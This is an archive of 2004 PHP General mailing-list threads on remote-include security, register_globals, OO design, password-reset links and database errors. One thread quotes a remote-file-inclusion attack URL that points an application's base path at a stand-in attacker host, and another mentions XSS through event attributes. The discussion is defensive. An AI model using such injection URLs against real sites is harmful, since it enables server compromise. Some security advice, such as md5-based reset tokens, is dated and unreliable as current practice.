got PHP files in your web tree that they can surf to, bypass your
configuration setting of $base_url, and execute code that the Programmer
never ever ever intended to be executed out of sequence (IE, without
having the code in config.php executed)
This is a MUCH BIGGER PROBLEM than remote include working or not.
That's down to your opinion and experience. Most packaged applications 
have all the files accessible in the webdir. In most apps changing this 
would mean a lot of rewriting.

If you can't do that, for whatever reason, you may be able to stop those
files from being executed outside the context in which they were intended:
 Convince Apache *not* to execute ".inc" files as PHP, for example.
Of course, some well-intentioned, but badly-designed, packages use
".inc.php" to force the execution of "include" files as PHP.
As we have seen here, you simply do not *want* that to happen.  Executing
snippets of code out of the context in which they were programmed is just
plain foolhardy.
I agree but your "perfect" world isn't the one I'm living in, if it 
were, we wouldn't have needed register_globals.

If you only shut down remote include, but leave these other issues
unaddressed, you're going to be restoring from a backup again sooner or
later anyway.
Quite.
You've got huge chunks of code in those packages that the bad guys are
executing all out of any sort of order that the Programmer ever even
thought about them.
So we agree that the programmer isn't always considering these things. 
Phew.

comprimise the site was to have a variable passed in the url to set the
base url to a remote site, which in turn output php to execute, i.e.:
http://example.com/config.php?base_url=http://myhacksite.example.com
Now, you are correct that education on how to avoid this kind of issue
is key, however that does not avoid the problem. Turning of register
globals would prevent many of these attacks, however there are still
many apps out there that require register globals to be on and there are
other ways to use this exploit with them off.

Please explain these other ways, or provide references.
Sorry, same way. I have seen ann application that set the base url in 
$_REQUEST. Needless to say it was avoided like the plague. And to be 
honest, it was the only app I've seen that did this.

Also, if an application requires register_globals on at this point in
time, it may be prudent to simply not support the installation of that
package.
That may seem harsh, even unreasonable, but at some point, it's time for
the application developers, who have quite some time now, to make their
software well-behaved with register_globals OFF.
Yeah I agree... unfortunately there are hosting companies who insist on 
keeping them for BC.
And I was a bit shocked when this first happened to me with a stable 
version of phpBB. It has since been fixed, but I wonder how many people 
were open to the attack. I wonder how manby people had not copied all of 
those include file out of the web dir? Many I imagine.

I appreciate your problems -- I'm just trying to tell you that your
solution is like swatting an elephant with a feather.
Rubbish. An enjoyable analogy nonetheless.
According to your logic, register globals wouldn't have been implemented 
because you could just loop through all the $_GET, $_POST ...etc and 
unset the global variable for each, and you should initialize every 
variable.
In the perfect world this would be true. But it aint is it? RAD and all 
that. :)

In my opinion this would be the most elegant way of clearing up this 
problem for good, so instead of:

1. Turn off register_globals if possible.
2. Check every bit of source code to see if affected.
3. Change apach config to not parse .inc files.
4. Educate the php world as to how to program in a nice and orderly fasion.
You would have:
1. Turn off allow_url_include if possible.
Anyway, I'm not going to argue the case for this any longer. I think 
it's a good idea but obviously nobody else does. The issue that I 
explained is avoidable, if it weren't then it would be a major 
exploit... that it is not. But it still remains an issue.

So yes, instead of having a language level featur

Re: [PHP] Launch windows application and fle

[Richard Lynch]

Chris Mason wrote:
> I have an internal application requirement to generate a webpage that
> lists
> media files (movies) on our linux server and when the user clicks the name
> of the file on the webpage, launch the application on the local machine
> playing the correct file. How can I accomplish that? I know the computers
> that will be used, this is not on the internet so there are no security
> concerns. I can change and configure the browsers at will, this is a
> single
> purpose computer under my direct control on which I have installed the
> application.

The easiest and cheapest way, under those circumstances, is to turn ON the
directory listing feature in Apache in httpd.conf (or .htaccess) for that
directory and throw the video files in that directory.

You'll also get some free bonuses in cool little icons for the files, and
their sizes (sometimes important for video choice by a user) displayed.

If that bothers you, then a combination of:
http://php.net/opendir
http://php.net/readdir
and possibly http://php.net/readfile if you want to keep the video files
to live outside the web tree.
should make this a 5-line job of about an hour or two of work.

See the rather long thread about Security from the past few days about the
pros and cons of this.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[rogerk]

Quoting Richard Lynch <[EMAIL PROTECTED]>:
> Actually, internally, it *is* a file, or part of a file, depending on the
> database implementation details. (*)

Part of a file?  Usually.  A file?  Rarely.

And as part of a file, it is likely to be accessed using a more poorly chosen
I/O model than if it were in a standalone file.

> So you're adding overhead into the storage and retrieve of your content
> for some unspecified (so far) benefit.

The benefit is clear.  If the so-called file is only going to be used by a
single PHP-plus-database application and never passed to a normal OS command
that operates on files, cool.  If it is to be accessed by multiple methods,
especially by normal OS-level processes, extracting it from a database into a
temporary file so it can be accessed by those commands each time is ridiculous.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] user password managment

[Richard Lynch]

> Does anybody have any tips or links for creating a system for managing
> user's passwords. I want to make it so that when a user is created, an
> email is sent with a link that allows them to set their password. The
> link should only work for a set amount of time. I have ideas for
> implementing something, but I have a hunch tat there is some code
> already out there for this. Does anybody know of any? Thanks!

Use the sample code in http://php.net/md5 to create a hash, and store that
in your database with a datetime value of now().  The hash will be quite
unpredictable by the Bad Guys.

Send that hash as part of the link in your email, and compare that hash to
yours in the database.

To make it even harder to bust, store the http://php.net/crypt *of* the
md5 hash value, so that the actual value in the database is not what they
need to send, but you can crypt what they send to see if it is the correct
value.  That way, if somebody gains access to read your database, the
values stored there do them no good.

Course, it's more likely that somebody will gain access to the recipient's
email, but there is little you can do about that in today's environment. 
Digitally-signed and secure email is nowhere near pervasive enough.

An alternative is to send them a randomly-generated password, storing only
the crypt() of it, of course, and then force them to change the password
on first login.

Since some email clients have a tough time getting long URLs, this can be
less intensive on your Support/Help resources (your time) and it's really
not a lot less secure than the long URL method.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Apache - MySQL connection via PHP

[Richard Lynch]

Mike Francis wrote:
> Hi,
> I am having a problem connecting to a MySQL database via PHP.
>
> I have Apache 2.0.52, PHP 5.0.2 and MySQL 4.1 installed and working OK
> individually.
> I have copied phpmysql.dll and mysqli.dll at different times to
> Windows/System32.
> I have set up a successful MyODBC connection with the database - so it
> exists.
> I can access MySQL from the command prompt, and from a web interface with
> no problem.
> However, when I run the following code I get a "Unable to connect to the
> database server at this time." error message.

>// Connect to the database server
>  $dbcnx = @mysql_connect('localhost', 'root', 'thisismypassword');
>  if (!$dbcnx) {
>  exit('Unable to connect to the ' .
>  'database server at this time.');


I believe http://mysql_error could be used in your code right before the
first 'exit' to give you more information.

Also try taking out the '@' for a trial run, just to see if you get a
useful error message from that.

You can put '@' back in after you fix this problem -- but it would be even
better to add an http://php.net/error_log before that exit with
http://php.net/mysql_error so that you can log your errors to the Apache
error log.

Then, when you have problems, you have to remember to open up your Apache
error log file.

In a standard install, that's:
C:\Program Files\Apache Group\apache2\logs\error_log
I do believe.

PS Excellent post, particularly the efforts to insure that MySQL was
running/working!

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[Richard Lynch]

Stuart Felenstein wrote:
>
> --- Jason Wong <[EMAIL PROTECTED]> wrote:
>
>> > Nothing is printing out on $_POST['var'] or $var
>> > s makes sense.
>>
>> Now why are you looking in $_POST for your form
>> values? They're in $_GET. You
>> said earlier that you understood POST and GET?
>
> I made the correction , using $_GET now.  Values are
> printing out, aside from the select lists (arrays)
> which print out as "array".

Yes.

An array will print as "Array"

You'll need to dig into the Array for what you need, or implode it, or
something.

We can't decide for you what you need to do, however.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] encrypt/decrypt sqlite data

[Richard Lynch]

Shawn McKenzie wrote:
> This is my first adventure with mcrypt and also the sqlite stuff.
>
> Via file upload I am getting a SQL dump file and running it as a query
> to insert data into a sqlite db.  This works great.
>
> Then I am trying to use an update query to encrypt fields in all rows by
> using the sqlite_create_function to run my encryption function that uses
> $_SESSION['key'] which is an md5 hash of a pass phrase):
>
>   $db = sqlite_open("db");
>   sqlite_create_function($db, 'enc', 'encrypt', 1);
>
>   $sql  = 'UPDATE mytable SET f1=enc(f1);'
>   .'UPDATE results SET f2=enc(f2);';
>
>   sqlite_query($db, $sql);

What are the data types of f1 and f2?

Are you sure they are large enough to hold the result of enc()?

If data is getting a little truncated, or not encryted/decrypted at the
end...

Some encryption functions require input data to be 'padded' to an even
multiple of a certain length.  EG, it must be an even multiple of 32-bytes
to be encrypted/decrypted.

Others, I think, pad the results with spaces for similar reasons.

So, possibly, somewhere in all of this, you just need to tack on:
length(x)%32 spaces to your text.

Or maybe you need to be more careful about using trim() and similar
functions in there.

>
> function encrypt($txt)
> {
>   $key = $_SESSION['key'];
>   $txt = trim($txt);

I don't think any of the encryption routines care about line feeds, though
the functions you use to process in a shell script or even mysql_query()
*might*...

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Multiple Inheritance

[Justin Palmer]

Hi,

Have you ever written a project and then moved to the next noticing that
you are doing some of the same things from last project (connecting to a
database, reading a file, writing to a file, etc...)?

Have either of you ever written a for loop? Of course, you have.

Have you ever written the for loop and then noticed (after you uploaded
the script to the server) that you wrote the loop with syntax errors?

If so, why not use an ArrayIterator?  If not, then you are a master in
the PHP realm.  I would have to assume that even the most experienced
php developer has done this once or twice in there life. It all amounts
to a waste of precious programming time. When this occurs.  Especially
when TIME = MONEY.

What if you were to build an application around the MySQL database.  You
have just finished the project and you are taking it to your boss.  You
get there and then your boss says, "you know what I would rather use
Oracle as our database".  With this situation you have, potentially,
wasted many hours writing the MySQL version.  What are you going to do
now, say something like, "Sorry boss, my application I designed is not
flexible enough for me to switch db's at this time.", as your promotion
for completing the project goes down the drain.

There are large arguments about both, I grew up on OO so that is how I
program and that is what I know.  Procedural does not even make sense to
me.  Using low-level functions and process over and over again, when the
functions and process can be written once and used on many projects over
and over again.

Also, do you ever go back and maintain projects that you have worked on
a year later.  If you used objects you would know exactly what you are
walking into, I doubt you can say that with a procedural state of mind.

Resources to learn more:

www.phppatterns.com
wact.sf.net
http://www.sitepoint.com/forums/forumdisplay.php?f=147
www.martinfowler.com

There are more resources: -> google is your friend.

I would put Pear, but personally I think that it started out to be a
good idea and has turned into a disaster, IMO. (Sorry to any Pear
lovers, I still think Pear is better than procedural).

I don't care if you program in procedural or oo, but I would like you to
educate yourself in the pluses and minuses of both.  If you have not
learned oo and know nothing about it, then learn it might surprise you.

I think the main problem is that PHP is still young in the OO world, it
grew up on procedural.  With this in mind there is no OO Standard that
people follow, like in Java, or .NET.  Pear is trying to address this
issue, but if you are not a Pear believer then you use some other
Standard, and so the cycle of NO STANDARD revolves.

And after saying all that, I will say that there are times on very small
projects that procedural does make more sense.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );


-Original Message-
From: Mike [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 11:08 AM
To: 'PHP General'
Subject: RE: [PHP] Multiple Inheritance


Richard,

Thank you for that.

I've been writing PHP apps for a while now but would not concider myself
an "expert". I just enjoy doing it and I know a fair bit about what I'm
doing. One thing I never quite got into (with PHP) is OO. Why - because
nothing I ever did really seemed to make sense as OO. I could easily
write a function that'd get called one or a few times and that was about
it. There didn't seem to be a need for objects to be used and re-used
and my scripts shouldn't ever run long enough for me to take advantage
of OO's abilities.

I was worried that I "didn't get it" (and I still might not... But
that's another issue) but maybe I'm not too far off the mark. It's just
useful to see other people's opinions on this topic. 

Maybe I'll be burned at the stake along with you... ;)

-M


> > What are some of the things you guys do to get around the fact that
> > classes in php4 can't do multiple inheritance?
> 
> What I do is not use classes.
> 
> At all.
> 
[snip] 
> I will probably be reviled as a heretic, but there it is.
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Multiple Inheritance

[Richard Lynch]

> Have you ever written a project and then moved to the next noticing that
> you are doing some of the same things from last project (connecting to a
> database, reading a file, writing to a file, etc...)?

Not quite the same thing.

When it is exactly the same thing, I just copy & paste the code.

Or, more likely, already have done that and changed it to a function.

> Have either of you ever written a for loop? Of course, you have.

Sure, though not very often.  I use while() a whole lot more.

> Have you ever written the for loop and then noticed (after you uploaded
> the script to the server) that you wrote the loop with syntax errors?

Rarely.

And only a very very very tiny percentage of my time is spent fixing typos
in syntax errors.

I spend a *LOT* more time, digging through endless class files, of what
are essentially name-spaces of singleton "objects" trying to find the line
of code some idiot typed that is doing the wrong thing, but starting from
'index.php' I have *NO* *IDEA* how it got in there.

I end up having to "grep" source code just to find the damn thing.

This doesn't happen in good code, whether it's OO or Procedural.

My point remains:

Inexperienced programmers being pushed to write OO code are going to write
*WORSE* code than inexpereienced programmers being forced to write
Procedural code.

The exception is if you have a fairly large TEAM of programmers, one of
which is a *VERY* experienced Architect who designs the OO framework, and
the less-experienced Programmers code the details on that framework within
the confines of the framework.

What I continually run into, however, is an inexperienced programmer,
grossly mis-using OO bits and pieces, in ways and means that make
unfathomable code.

I truly believe we should simply not encourage inexperienced programmers
to *design* systems, on their own, with OO (except as an exercise).

You just end up with this larger mess of objects flying around in no real
order or pattern that makes any sense at all.

> If so, why not use an ArrayIterator?  If not, then you are a master in
> the PHP realm.  I would have to assume that even the most experienced
> php developer has done this once or twice in there life. It all amounts
> to a waste of precious programming time. When this occurs.  Especially
> when TIME = MONEY.

H.  Let's see.

You want me to learn a whole new syntax, with a whole new ArrayIterator
thingie, so I can have more syntax to memorize, and get wrong, and so I
can type more, and so I can have more lines of code to maintain.

No, thank you.

Been there; done that; hated it.

And I had *more* syntax errors, not less.  Not to mention *more* bugs,
sometimes very subtle bugs, introduced by the stupid Iterator classes.

It's really really really hard to not understand what:
for($i = 0; $i < 10; $i++)
does after a few weeks of study.

The same cannot be said of the ArrayIterator counterpart.

> What if you were to build an application around the MySQL database.  You
> have just finished the project and you are taking it to your boss.  You
> get there and then your boss says, "you know what I would rather use
> Oracle as our database".  With this situation you have, potentially,
> wasted many hours writing the MySQL version.  What are you going to do
> now, say something like, "Sorry boss, my application I designed is not
> flexible enough for me to switch db's at this time.", as your promotion
> for completing the project goes down the drain.

Hey boss, I wrote this application with performance in mind, and switching
to Oracle will be very easy, but some of the more complex queries will
need to be tweaked once we find out which ones Oracle excels at.

How many real-world users switch from MySQL (free) to Oracle (very not
free) with such short notice?

> There are large arguments about both, I grew up on OO so that is how I
> program and that is what I know.  Procedural does not even make sense to
> me.  Using low-level functions and process over and over again, when the
> functions and process can be written once and used on many projects over
> and over again.

I grew up on OO, using it extensively after one (1) semester of PL/1 in
college, continuing to use it for over two decades, and will happily use
it WHEN IT MAKES SENSE.

If you view procedureal programming as not re-using code, then you're not
writing good procedural programming.

More importantly, your OO programming probably isn't all that re-usable
either, as the basic rules and paradigms of code re-use transcend OO and
procedural implementation.

> Also, do you ever go back and maintain projects that you have worked on
> a year later.  If you used objects you would know exactly what you are
> walking into, I doubt you can say that with a procedural state of mind.

Bull!

Bad OO programming, or Bad procedural programming will make
un-maintainable code.

The converse is also true:  Good procedural programming is just as easily
maintained as good OO programming.

I've h

[PHP] flash data grid + php

[blackwater dev]

Is anyone using one of the flash data grids within their php
application?  I am looking to do the same thing but didn't know if it
is more work than it's worth.

Thanks!

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Forms In PHP

[Richard Lynch]

Wil Hitchman wrote:
> I created a web form in PHP and used a couple of email addresses.  The
> only email address that worked when I submitted to the form (for testing
> purposes) was my Yahoo address.  My AOL, hotmail and other work addresses
> did not work.  Can someone tell me why?

Technically, "To: " is only supposed to allow one (1) email address.

Assuming you are using sendmail or one of its popular drop-in
replacements, they will support "To: " with multiple emails, but it's not
RFC that they have to.

So while I don't think it's the real problem, you're better off using "Cc:
" headers in the optional fourth argument to http://php.net/mail to be
standards-based.

Most likely, however, the email you sent was flagged as spam by AOL and
hotmail, but not yahoo.  So the email got sent just fine, but they throw
it out before you ever saw it.

You can research how spam filters work to make your email look less like
spam and tray again.

Unless you plan on sending spam, in which case you should just quit :-)

-- 
Like Music?
http://l-i-e.com/artists.htm


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] recompiling php

[Khan]

blackwater dev wrote:
I am a linux newbie and I have php 4.3.8 and Apache 2 installed that
ws installed with the Fedora 2 install.  I am getting errors that php
wasn't compiled with mysql support so now I am trying to do that but
get this error when I try to compile:
Sorry, I cannot run apxs.  Possible reasons follow:
 
1. Perl is not installed
2. apxs was not found. Try to pass the path using --with-apxs2=/path/to/apxs
3. Apache was not built using --enable-so (the apxs usage page is displayed)
 
I did a locate on my box and it just seems to find the apx manuals. 
What should I do?  Recompile apache?  Try to find apxs?
install apt-get and then #apt-get install php-mysql
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: Re: [PHP] Close all open tags in HTML text

[John Holmes]

> From: "Richard Lynch" <[EMAIL PROTECTED]>

> Matt Palermo wrote:
> > but just make sure that ending
> > tags exist, so it doesn't screw up the rest of the page.  Strip tags would
> > just wipe out the HTML rather than allowing it and ending it safely.
> 
> Strip tags will allow you to wipe out *DANGEROUS* HTML which will make
> your web server a source of problems not only to you, but to me as well.
> 
> Please use strip_tags to allow only the tags you *NEED* the users to be
> able to use.
> 
> It will only take you seconds, and it will save you (and us) a lot of
> grief in the long run.

strip_tags() is a rather worthless function, if you ask me. It strips such evil 
code as  or anything else surrounded by < and >. It's "allowed tags" 
attribute is misleading, also. You can think you're safe by allowing  tags, 
but I can include onmouseover (or any other) events to trigger javascript and 
XSS attacks. 

You're better to roll your own solution or just run everything through 
htmlentities()/htmlspecialchars() and show the user exactly what they typed. 

I'm on a crusade against the use of strip_tags(), if you haven't figured that 
out yet. :)

---John Holmes...

UCCASS - PHP Survey System
http://www.bigredspark.com/survey.html

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] How to post form-data to a host using PHP

[Khan]

Yao, Minghua wrote:
Hi,
Does anybody know how to post form-data to a host using PHP? Thanks for the 
answer.
-Minghua
http://www.tizag.com/phpT/forms.php Enyoj
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Spurious newlines when requesting empty php file

[Michael Sims]

Richard Lynch wrote:
> Carl Michael Skog wrote:
>> I would have thought that the response from a empty php file would
>> also be empty, but, to my surprise, they consist of 3 newlines !!!
>
> I just tried this with an empty PHP file, and got exactly what I
> expected.
>
> A valid response with no content at all.
>
> Please specify your software versions, and provide URLs and, as silly
> as this sounds, an "ls -als empty.php" so we can see your empty PHP
> file.

Maybe he's using "lynx -dump " to test this.  Lynx adds several newlines 
to the
output.  However, Links does not:

$ touch empty.php
$ lynx -dump http://localhost/empty.php | od -c
000  \n  \n  \n
003
$ links -dump http://localhost/empty.php | od -c
000

Just to add to the guessing... :)

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Richard Lynch]

>>Yeah, with any luck at all, your binary file will corrupt itself, and
>> then
>>make your entire database unreadable by anybody, even you.
> really? Then my companies database should be corrupt by now...right?

> Haven't
> had any problems yet. Well, its only been running for 2 years now.

Search the archives.  There are known instances of what I described
happening.

I'm not claiming it's common.

It's *more* common than a single corrupt file in the file system trashing
the entire file system, taking all your data with it.

What exactly does storing the binary file in SQL get you?

Does your SQL search through the binary data doing a face-recognition
match in some customer MySQL library code to find criminals by facial
features?

[shrug]

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Greg Donald]

On Fri, 10 Dec 2004 17:17:53 -0500, Greg Beaver <[EMAIL PROTECTED]> wrote:
> yep, unless the function names happen to conflict with ones you've
> already written.

for file in *.php; do
cp $file $file.tmp
sed -e "s/bad/good/g" $file.tmp >$file
rm $file.tmp
done


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] How to post form-data to a host using PHP

[Jay Blanchard]

[snip]
Does anybody know how to post form-data to a host using PHP? Thanks for
the answer.
[/snip]

Yes. You're welcome.





You may want to Google for PHP tutorials. They're easy and go step by
step.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Friendly URL

[Richard Lynch]

Bruno B B Magalhães wrote:
> Hi guys,
>
> As part of my framework I have a URI decoder so it explode, remove
> unnecessary data (as GET query) amd put it into an array...
>
> Is there any better way of doing this (faster?), just wondering.
>
>   if(isset($_SERVER['REQUEST_URI']) === true)
>   {
>   $path = explode('/',$_SERVER['SCRIPT_NAME']);
>
>   $total_paths = count($path);
>
>   $path = 
> stristr($_SERVER['REQUEST_URI'],$path[$total_paths-1]);
>
>   $path = explode('/',$path);
>
>   $total_paths = count($path);
>
>   $i = 0;
>
>   for($i=0;$i<$total_paths;$i++)
>   {
>   $get_string = false;
>
>   $get_string = stristr($path[$i],'?');
>
>   if($get_string)
>   {
>   $get_string = "\\".$get_string;
>   $this->uri[$i] =
> strtolower(addslashes(strip_tags(eregi_replace($get_string,'',$path[$i])
> )));
>   }
>   else
>   {
>   $this->uri[$i] = 
> strtolower(addslashes(strip_tags($path[$i])));
>   }
>   }
>   }

I could be wrong, but I think you've just re-written the code that is
already in PHP to give you $_SERVER['PATH_INFO']



-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Not quite PHP, but related...

[Bruno B B Magalhães]

Hi you all,
is that possible using .htaccess to redirect every request to a 
specified script?

for example if you have:
http://www.yoursite.com/en/articles/blab.html
where there isn't a en dir., so it would be redirected to
public_html/site
I could use error page, but it won't receive post, get, cookie and 
session headers.

Regards,
Bruno B B Magalhaes
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Greg Beaver]

Greg Donald wrote:
with it, but I will go grab a PEAR module if it fits my needs. Code
re-use may be the only redeeming quality of OO programming, and
honestly I can re-use your code from a non-OO include file just as
easily.
yep, unless the function names happen to conflict with ones you've 
already written.  Then, you run into the 
oh-crap-I-should-have-planned-to-use-other-code-oh-well-I-guess-I'll-rename-everything-and-waste-hours 
problem.  Class names occasionally conflict, but this tends to be a much 
smaller and simpler search-and-replace.

Until PHP gets namespaces (translation: never), OO is the only way to do 
code re-use.  Of course, most PHP programmers believe it is faster to 
write everything from scratch.

More power to them, I'll use [good] code that already exists over my own 
"brilliant solutions" any day, thank you very much.

I would challenge anyone advocating functions: how many of you have had 
to modify your function-based program to do a similar thing and been 
forced to rewrite?  Even with well-designed functions, you end up with 
this problem - code modification is impossible.  This is why I hardly 
ever use static methods or functions.  Notice - I do use these things, 
but you have to know when it is appropriate to do so.

functions and static methods should be used for code that you can 
guarantee you *don't* want to change - ever (well, at least almost 
never).  Anything that you may need to extend or modify functionality 
must be implemented with something more flexible, or you're going to get 
screwed at some point.  Static methods should be used for any functions 
that are re-distributable so that others can plug them in without risk 
of name conflicts.

If you're writing the code for Yahoo like Rasmus, you're going to write 
the fastest code imaginable, and you will also be working on the C code 
to do things.

If you're writing the code for podunk.com, or even for a mid-level 
traffic site, it is extremely unlikely that you will notice even the 
slightest difference between OO and non-OO code.  The biggest hogs in 
php programming are:

1) unnecessary images and animated crap/unnecessary javascript
2) terrible database usage
3) too much complexity in the design
It doesn't matter whether you are using OO or functions - if your 
application has too many lines of code per task, it won't be fast.

Greg
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Greg Donald]

On Fri, 10 Dec 2004 14:07:21 -0800, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
> And, by the way, once you upload it into a database, it's not a file.  It's 
> just
> a data field.

And the data fields are just files on the file system.  Look at the
way Postgres stores data.

The filesystem itself is just a low level database.

I make these sort of choices by benchmark whenever possible:
http://www.zend.com/zend/trick/tricks-sept-2001.php


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] allow_url_fopen ini directive not enough

[Richard Lynch]

KJ wrote:
> OK, apologies on my part, I did not correctly explian the problem which
> can and has arisen from remote includes.
>
> I'll try to explain the problem that I have come across twice in the
> last couple of years both with popular software packages that I
> downloaded like thousands of others and both with exactly the same
> vunerability and both resulted in my site being comprimised and having
> to resort to backups.
>
> The vunerability occurred where both applications had a variable setting
> a base directory of the source code, which was used when including files
> throughout the application, i.e.:
>
> $base_url = '/home/example.com/www';
> include_once ($base_url.'/config.php');
>
> In config.php you would then have, for example:
>
>  include_once ($base_url.'/whatever.php');
> ...
> ?>
>
> Now in each instance register globals was on and all that was needed to

You should turn register_globals off, first of all.

Secondly, something is very very very wrong in your analysis.

If this line of code gets executed:

$base_url = '/home/expample.com/www';

then the setting of register_globals can have *NO* effect on $base_url.

It is being initialized, as it should, to a correct value, in that line of
code.  Any GET/POST data being sent in, is junked when that line is
executed.

Therefore, they must *ALSO* be surfing to a page which does not correctly
'include' the code which sets $base_url in the first place.

So, not only do you have register_globals "on" which is a Bad Idea, you've
got PHP files in your web tree that they can surf to, bypass your
configuration setting of $base_url, and execute code that the Programmer
never ever ever intended to be executed out of sequence (IE, without
having the code in config.php executed)

This is a MUCH BIGGER PROBLEM than remote include working or not.

You've *GOT* to get those files *OUT* of the web-tree.

The only files that belong in the web tree are those that should be surfed
to.

If you can't do that, for whatever reason, you may be able to stop those
files from being executed outside the context in which they were intended:
 Convince Apache *not* to execute ".inc" files as PHP, for example.

Of course, some well-intentioned, but badly-designed, packages use
".inc.php" to force the execution of "include" files as PHP.

As we have seen here, you simply do not *want* that to happen.  Executing
snippets of code out of the context in which they were programmed is just
plain foolhardy.

So force any ".inc.php" files to *NOT* be executed by PHP, while leaving
".php" working, of course.

Once you have done that, the remote include can't work, because nothing
gets executed unless $base_url is properly initialized.

If you only shut down remote include, but leave these other issues
unaddressed, you're going to be restoring from a backup again sooner or
later anyway.

You've got huge chunks of code in those packages that the bad guys are
executing all out of any sort of order that the Programmer ever even
thought about them.

It's hard enough to find bugs and security flaws when your code is
executed in order:  It's IMPOSSIBLE to do so when your source code is
thrown in a blender with no lid and the parts the fly out get executed.

> comprimise the site was to have a variable passed in the url to set the
> base url to a remote site, which in turn output php to execute, i.e.:
>
> http://example.com/config.php?base_url=http://myhacksite.example.com
>
> Now, you are correct that education on how to avoid this kind of issue
> is key, however that does not avoid the problem. Turning of register
> globals would prevent many of these attacks, however there are still
> many apps out there that require register globals to be on and there are
> other ways to use this exploit with them off.

Please explain these other ways, or provide references.

Not claiming they don't exist, but unless you identify them as well,
there's no way to solve them.

Also, if an application requires register_globals on at this point in
time, it may be prudent to simply not support the installation of that
package.

That may seem harsh, even unreasonable, but at some point, it's time for
the application developers, who have quite some time now, to make their
software well-behaved with register_globals OFF.

If they are ignoring this obvious, well-documented, easily fixed issue,
then you should be running away screaming from their source code, because
who knows what more subtle security issues are lurking in there?

> Now all I'm saying is that given the potential for damage and , from my
> point of view, the little improvement that this feature actually
> provides, why would you NOT have a way of disabling it. I would if I
> could, and I know of others who would as well.
>
> Any thoughts?

> PS: If you gave someone that you didn't trust access to your scripts
> then you're asking for trouble, that was not my point and was not part
> of any kind of thinking towards this request.

No, but it is

Re: [PHP] allow_url_fopen ini directive not enough

[KJ]

OK, I don't think you've read my posts in much detail at all. I looks as 
though you have skimmed over them and got a pre-determined idea of my 
issue in your head.

Not once have I mentioned anything about "customers" in my posts. I'm 
not a web host. I'm not talking about people who have access to my web 
server uploading malicious scripts; I know that if I give people that I 
don't trust access to my server then they could f**k things up... 
obviously. I'm not a script kiddie who wants to stop people using the 
mail() function or something like that, I'm talking about a real life 
vunerability.

Let me try to paint another simple senario:
1. You have a shared hosting account with example.com hosted on it.
2. You want a guestbook setup on it, and you've found one that you like.
3. You install "phpMyFantasticGuestbook" onto your account.
4. It's a well used application and thus you don't go through the source 
to check for vunerabilities.
5. Joe Hacker has studied the script coz he's a tart that wants to piss 
people off and he has found a vunerability.
6. Joe Hacker uses the vunerability to change your account passwd. He 
then logs in as you and deletes all your files. He has access to your 
mysql password which was in the congif file of phpMyFantasticGuestbook 
and he deletes all your data, he then leaves a nice index.php in your 
account to say that he's been by.

This is what I'm talking about, I hope this is clear. The vunerability I 
described in one of my previous posts.

The "worry" that I'm expending comes from being hacked twice using this 
method, I think the amount of worry expended is in line with the amount 
of frustration that I have endured.

KJ
Richard Lynch wrote:
Call me silly, but...
If you don't check the source code, and you think they might be using
include "http://";...
What's the difference between that and not checking all the zillion things
your customers might do that's about 100 X as stupid?
Seems to me you're expending a fair amount of 'worry' over something that,
given that you're not checking their source in the first place, is kind of
meaningless...
Not that I'm suggesting that you *SHOULD* be checking their source -- Only
that the risk you take as part and parcel of your business is untrusted
users putting code on your machine.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Greg Donald]

On Fri, 10 Dec 2004 13:04:49 -0800, Justin Palmer
<[EMAIL PROTECTED]> wrote:
> What if you were to build an application around the MySQL database.  You
